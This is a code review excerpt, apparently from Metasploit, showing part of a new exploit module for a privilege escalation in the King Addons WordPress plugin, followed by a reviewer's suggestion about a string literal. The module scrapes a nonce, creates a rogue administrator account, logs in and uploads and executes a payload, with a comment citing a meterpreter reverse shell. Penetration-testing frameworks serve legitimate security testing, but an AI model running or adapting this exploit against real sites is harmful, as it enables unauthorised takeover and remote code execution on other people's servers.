modules/exploits/multi/http/wp_king_addons_privilege_escalation.rb

```diff
@@ -0,0 +1,208 @@
+            }
+          ],
+          [
+            'Windows Command Shell',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('NONCE_PAGE', [true, 'Path to page containing King Addons Login Register Form widget', '']),
+        OptString.new('USERNAME', [true, 'Username to create', Faker::Internet.username]),
+        OptString.new('PASSWORD', [true, 'Password for the new user', Faker::Internet.password(min_length: 8)]),
+        OptString.new('EMAIL', [true, 'Email for the new user', Faker::Internet.email])
+      ]
+    )
+  end
+
+  def check
+    return CheckCode::Unknown unless wordpress_and_online?
+
+    plugin_check = check_plugin_version_from_readme('king-addons', '51.1.35', '24.12.92')
+    return plugin_check if plugin_check == CheckCode::Safe
+
+    @nonce = find_nonce
+    return CheckCode::Unknown('Could not find nonce on specified page') unless @nonce
+
+    CheckCode::Appears
+  end
+
+  def exploit
+    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
+
+    result = create_admin_user(datastore['USERNAME'], datastore['PASSWORD'], datastore['EMAIL'])
+    fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.') if result == false
+
+    print_warning('User already exists, attempting login with provided credentials...') if result == :user_exists
+
+    admin_cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+    unless admin_cookie
+      msg = 'Failed to log in to WordPress admin.'
+      msg += ' User may exist with a different password.' if result == :user_exists
+      fail_with(Failure::UnexpectedReply, msg)
+    end
+
+    upload_and_execute_payload(admin_cookie)
+  end
+
+  private
+
+  def find_nonce
+    nonce_page = normalize_uri(target_uri.path, datastore['NONCE_PAGE'])
+    res = send_request_cgi('method' => 'GET', 'uri' => nonce_page)
+    return nil unless res&.code == 200
+
+    doc = res.get_html_document
+    return nil unless doc
+
+    script_nodes = doc.xpath('//script[contains(text(), "king_addons_login_register_vars")]')
+
+    script_nodes.each do |script_node|
+      nonce = extract_nonce_from_script(script_node.text)
+      return nonce if nonce
+    end
+
+    vprint_warning('Could not find nonce')
+    nil
+  end
+
+  def extract_nonce_from_script(script_content)
+    match = script_content.match(/king_addons_login_register_vars\s*=\s*({[^;]+})/)
+    return nil unless match
+
+    json_data = begin
+      JSON.parse(match[1].gsub(%r{\\/}, '/'))
```

Comment:
Would the string literal not work here?

```suggestion
      JSON.parse(match[1].gsub('\/', '/'))
```